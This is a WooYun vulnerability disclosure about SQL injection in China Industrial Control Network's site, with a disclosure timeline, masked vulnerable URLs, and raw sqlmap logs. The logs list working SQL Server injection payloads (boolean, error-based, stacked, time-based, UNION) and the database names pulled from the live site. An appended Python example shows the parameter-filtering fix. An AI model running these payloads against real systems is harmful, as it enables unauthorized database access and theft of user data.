WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
Disclosure timeline:
2015-10-27: Details reported to the vendor, awaiting vendor handling
2015-10-30: Vendor confirmed; details visible only to the vendor
2015-11-09: Details disclosed to core white hats and experts in the relevant field
2015-11-19: Details disclosed to regular white hats
2015-11-29: Details disclosed to intern white hats
2015-12-14: Details disclosed to the public

Multiple vulnerabilities in China Industrial Control Network (中国工控网) expose 3 million user accounts and passwords that can be used to log in (旺财谷经融)
http://**.**.**.**/SheYingPhotoContent.aspx?photoid=2012013016324000001
http://**.**.**.**/Ashx/Base/GetCompany.ashx?city=
http://**.**.**.**/customer/hite_20110815/energy_details.asp?id=2011090517235600003
http://**.**.**.**/customer/rockwell/com-detail.asp?id=2936
http://**.**.**.**/customer/photo/zpzs_hy_list.Asp?industryid=2012071311541500002
http://**.**.**.**/customer/photo/hjzp_user_detail.asp?Id=10926
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: photoid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: photoid=2012013016324000001' AND 9243=9243 AND 'aoVa'='aoVa

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: photoid=2012013016324000001' AND 2346=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (2346=2346) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113))) AND 'Irzr'='Irzr

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: photoid=2012013016324000001';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: photoid=2012013016324000001' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 19 columns
    Payload: photoid=-1674' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(79)+CHAR(103)+CHAR(87)+CHAR(77)+CHAR(69)+CHAR(85)+CHAR(114)+CHAR(99)+CHAR(81)+CHAR(76)+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
[16:00:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[16:00:43] [INFO] fetching database names
[16:00:44] [WARNING] the SQL query provided does not return any output
[16:00:44] [WARNING] the SQL query provided does not return any output
[16:00:44] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:00:44] [INFO] fetching number of databases
[16:00:44] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:00:44] [INFO] retrieved:
[16:00:45] [WARNING] time-based comparison requires larger statistical model, please wait.........................
[16:01:20] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[16:01:22] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[16:01:25] [ERROR] unable to retrieve the number of databases
available databases [19]:
[*] aspnetdb
[*] blog
[*] edc
[*] exam
[*] GkNetAid
[*] GkRegUser
[*] gkstudy
[*] gksystem
[*] gongkong_1
[*] gongkonghelp
[*] gongkongNet
[*] gongkongnetpro
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xuegongkong
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: id=2936;IF(1985=1985) SELECT 1985 ELSE DROP FUNCTION FJHb--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=2936;WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=2936 WAITFOR DELAY '0:0:5'--
---
[16:07:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[16:07:37] [INFO] fetching database names
[16:07:37] [INFO] fetching number of databases
[16:07:37] [INFO] resumed: 52
[16:07:37] [INFO] resumed: ABB
[16:07:37] [INFO] resumed: agongkong
[16:07:37] [INFO] resumed: ase_050124
[16:07:37] [INFO] resumed: caa
[16:07:37] [INFO] resumed: cfpmia
[16:07:37] [INFO] resumed: cus_2010_for_bb
[16:07:37] [INFO] resumed: cus_abb
[16:07:37] [INFO] resumed: cus_abb_BC
[16:07:37] [INFO] resumed: custom
[16:07:37] [INFO] resumed: custom_1
[16:07:37] [INFO] resumed: forzdao
[16:07:37] [INFO] resumed: GkCrm
[16:07:37] [INFO] resumed: gkmall
[16:07:37] [INFO] resumed: gknetdatanew
[16:07:37] [INFO] resumed: gkoa
[16:07:37] [INFO] resumed: gkreguser
[16:07:37] [INFO] resumed: gkstat
[16:07:37] [INFO] resumed: GkStudy
[16:07:37] [INFO] resumed: gkstudynet
[16:07:37] [INFO] resumed: gksystem
[16:07:37] [INFO] resumed: gongkong
[16:07:37] [INFO] resumed: gongkongcorp
[16:07:37] [INFO] resumed: GongKongNet
[16:07:37] [INFO] resumed: inquire
[16:07:37] [INFO] resumed: kpi2012
[16:07:37] [INFO] resumed: lndata_tmp
[16:07:37] [INFO] resumed: LouKong
[16:07:37] [INFO] resumed: master
[16:07:37] [INFO] resumed: model
[16:07:37] [INFO] resumed: msdb
[16:07:37] [INFO] resumed: NBBS
[16:07:37] [INFO] resumed: NDic
[16:07:37] [INFO] resumed: NMessage
[16:07:37] [INFO] resumed: NRegUser
[16:07:37] [INFO] resumed: NRegUserDynamic
[16:07:37] [INFO] resumed: NSys
[16:07:37] [INFO] resumed: NSysLog
[16:07:37] [INFO] resumed: nweblog
[16:07:37] [INFO] resumed: opc_2009
[16:07:37] [INFO] resumed: peCms
[16:07:37] [INFO] resumed: Photography
[16:07:37] [INFO] resumed: ReportServer
[16:07:37] [INFO] resumed: ReportServerTempDB
[16:07:37] [INFO] resumed: schneider_data
[16:07:37] [INFO] resumed: SchneiderBBS
[16:07:37] [INFO] resumed: siemensQuiz
[16:07:37] [INFO] resumed: tempdb
[16:07:37] [INFO] resumed: wap2011
[16:07:37] [INFO] resumed: wapsubscribe
[16:07:37] [INFO] resumed: xiugongkong
[16:07:37] [INFO] resumed: xuegongkong
[16:07:37] [INFO] resumed: youjiang
available databases [52]:
[*] ABB
[*] agongkong
[*] ase_050124
[*] caa
[*] cfpmia
[*] cus_2010_for_bb
[*] cus_abb
[*] cus_abb_BC
[*] custom
[*] custom_1
[*] forzdao
[*] GkCrm
[*] gkmall
[*] gknetdatanew
[*] gkoa
[*] gkreguser
[*] gkstat
[*] GkStudy
[*] gkstudynet
[*] gksystem
[*] gongkong
[*] gongkongcorp
[*] GongKongNet
[*] inquire
[*] kpi2012
[*] lndata_tmp
[*] LouKong
[*] master
[*] model
[*] msdb
[*] NBBS
[*] NDic
[*] NMessage
[*] NRegUser
[*] NRegUserDynamic
[*] NSys
[*] NSysLog
[*] nweblog
[*] opc_2009
[*] peCms
[*] Photography
[*] ReportServer
[*] ReportServerTempDB
[*] schneider_data
[*] SchneiderBBS
[*] siemensQuiz
[*] tempdb
[*] wap2011
[*] wapsubscribe
[*] xiugongkong
[*] xuegongkong
[*] youjiang
Parameter filtering
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-10-30 17:37
CNVD has confirmed and reproduced the described issue and has notified the website operator by email through its publicly listed contact channel; the operator will provide a fix.
None yet
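The fix listed above is "parameter filtering". The following Python script is an added example, not code from the original report or from the affected site, showing what that fix means for the id/photoid endpoints: a strict decimal whitelist applied before the value reaches SQL, followed by a bound query parameter. SQLite is used as a stand-in for the SQL Server back end, the table and column names are hypothetical, and the two payload strings are copied from the sqlmap output above purely as rejection test cases. The concatenating lookup is kept beside the hardened one so the contrast is visible: the same boolean-based payload is accepted by the database on the unsafe path and refused before any query runs on the safe path.

```python
"""Added example: the "parameter filtering" fix for the id/photoid endpoints.

Not code from the original report or from the affected site. SQLite stands in
for the SQL Server back end; table and column names are hypothetical.
"""
import re
import sqlite3
from typing import Optional

# Whitelist for record ids: the vulnerable endpoints only ever expect a decimal
# number, so quotes, spaces, semicolons, signs and comment markers are all
# rejected before the value gets anywhere near SQL.
ID_PATTERN = re.compile(r"[0-9]{1,19}")

# Copied from the sqlmap output above (boolean-based blind on photoid, stacked
# query on id); used here only to show that the whitelist rejects them.
SAMPLE_PAYLOADS = [
    "2012013016324000001' AND 9243=9243 AND 'aoVa'='aoVa",
    "2936;WAITFOR DELAY '0:0:5'--",
]


def is_valid_id(raw: str) -> bool:
    """True only for a plain decimal id; fullmatch rejects any surrounding characters."""
    return ID_PATTERN.fullmatch(raw) is not None


def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the site's record tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE records (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO records VALUES (?, ?)",
        [(2012013016324000001, "sample photo"), (2936, "sample company")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, raw_id: str) -> Optional[str]:
    """The concatenation pattern that made the endpoints injectable (contrast only).

    The raw parameter is spliced into the SQL text, so a tautology such as the
    boolean-based payload is valid SQL and still returns the row.
    """
    sql = f"SELECT title FROM records WHERE id = '{raw_id}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> Optional[str]:
    """Hardened version: validate first, then bind the value as a query parameter."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a plain decimal number")
    row = conn.execute(
        "SELECT title FROM records WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


def handle_request(conn: sqlite3.Connection, raw_id: str) -> str:
    """Request-handler shape: a rejected parameter never produces a SQL round trip."""
    try:
        title = lookup_safe(conn, raw_id)
    except ValueError:
        return "rejected"
    return "not found" if title is None else f"found: {title}"


if __name__ == "__main__":
    db = make_demo_db()
    print("valid id    ->", handle_request(db, "2936"))
    for payload in SAMPLE_PAYLOADS:
        print("payload     ->", handle_request(db, payload))
    print("unsafe path ->", lookup_unsafe(db, SAMPLE_PAYLOADS[0]))
```

The whitelist and the bound parameter are independent layers: the regex stops malformed input at the edge (and gives a clean point to log and alert on), while the parameterized query guarantees that even a value which slips past validation is treated as data rather than SQL text. On SQL Server the equivalent is a SqlParameter on a SqlCommand, or a parameterized ADO Command object in classic ASP, rather than string concatenation.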